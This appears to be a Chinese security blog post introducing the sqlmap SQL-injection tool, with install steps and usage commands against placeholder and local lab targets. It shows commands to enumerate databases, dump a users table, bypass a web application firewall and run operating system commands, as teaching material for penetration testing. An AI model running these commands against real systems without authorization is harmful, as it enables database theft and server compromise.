点击蓝字
关注我们
始于理论,源于实践,终于实战
老付话安全,每天一点点
激情永无限,进步看得见
严正声明
本号所写文章方法和工具只用于学习和交流,严禁使用文章所述内容中的方法未经许可的情况下对生产系统进行方法验证实施,发生一切问题由相关个人承担法律责任,其与本号无关。
特此声明!!!
SQLmap简介
SQLMap 是一款开源的自动化SQL注入工具,主要用于检测和利用Web应用程序中的SQL注入漏洞。它由Python编写,具有高度的灵活性和强大的功能,广泛应用于渗透测试和安全评估中。
功能特点
支持多种数据库:
完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统1。
多种SQL注入技术:
支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入等多种注入技术1。
自动识别注入点:
能够自动检测SQL注入漏洞,并识别出注入点。
数据获取功能:
可以获取数据库名称、表名、列名及具体数据,支持完全下载某个数据库中的某个表,也可以只下载某个表中的某几列,甚至只下载某一列中的部分数据。
高级功能:
利用SQL注入漏洞获取操作系统级别的访问权限,包括获取shell访问权限,甚至是完全控制受影响的服务器。
自动植入数据库后门,方便未来的访问2。
用户可以定义具体的注入点,甚至自定义SQL查询来提取数据。
多种目标指定方式:
支持通过URL、直接连接数据库、代理日志文件等方式指定目标。
输出级别控制:
提供多个输出级别,用户可以根据需要选择显示的信息详细程度,从只显示错误信息到显示完整的HTTP请求和响应1。
更新便捷:
支持通过Git拉取最新的代码,保持工具的更新和维护。
上干货,sqlmap安装使用
安装步骤
sqlmap是一款用python编写自动化SQL注入工具。所有需要先安装Python,完成之后再安装sqlmap。
下载sqlmap,解压后放入Python根目录下
cmd命令行进入sqlmap(或者打开Python文件路径,在文件路径里直接输入cmd)
cd C:Program FilesPython38sqlmap
sqlmap.py -h
cd路径根据实际情况填写。
出现此信息则安装成功
配置sqlmap环境变量,因为只能在sqlmap目录下使用命令,为了方便在任何地方使用,添加环境变量
完成后双击sqlmap.py即可运行。
基本使用方法
检测SQL注入漏洞
检测一个URL是否存在SQL注入漏洞,可以使用以下命令:
http://localhost/bWAPP/portal.php
这将自动检测目标URL是否存在SQL注入漏洞,并尝试识别数据库类型。
列出所有数据库
在确认目标网站存在SQL注入漏洞后,可以使用以下命令列出所有数据库:
sqlmap -u http://example.com/vulnerable.php?id=1 --dbs
列出指定数据库的所有表
获取指定数据库中的所有表名:
sqlmap -u http://example.com/vulnerable.php?id=1 -D users_db --tables
列出指定表的所有列
获取指定表中的所有列名:
sqlmap -u http://example.com/vulnerable.php?id=1 -D users_db -T users --columns
提取指定表中的数据
提取指定表中的数据:
sqlmap -u http://example.com/vulnerable.php?id=1 -D users_db -T users --dump
设置HTTP头
有时需要设置额外的HTTP头,例如User-Agent或Referer:
sqlmap -u http://example.com/vulnerable.php?id=1 --headers="User-Agent: Mozilla/5.0"
处理登录认证
如果目标网站需要登录认证,可以使用以下命令:
sqlmap -u http://example.com/vulnerable.php?id=1 --auth-type=Basic --auth-cred=user:password
限制请求速率
如果目标网站对请求速率有限制,可以设置请求延迟:
sqlmap -u http://example.com/vulnerable.php?id=1 --delay=5
绕过WAF
有些网站使用Web应用防火墙(WAF)来防止SQL注入攻击。可以使用--tamper参数来绕过WAF:
sqlmap -u http://example.com/vulnerable.php?id=1 --tamper=space2comment
操作系统命令执行
在某些情况下,可以利用SQL注入漏洞在目标服务器上执行操作系统命令:
http://localhost/bWAPP/portal.php
0
注:SQLmap不能直接扫描网站漏洞,先找到注入点,再使用SQLmap验证并利用注入点.
END
老付
欢迎扫码
关注我们
网络安全
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...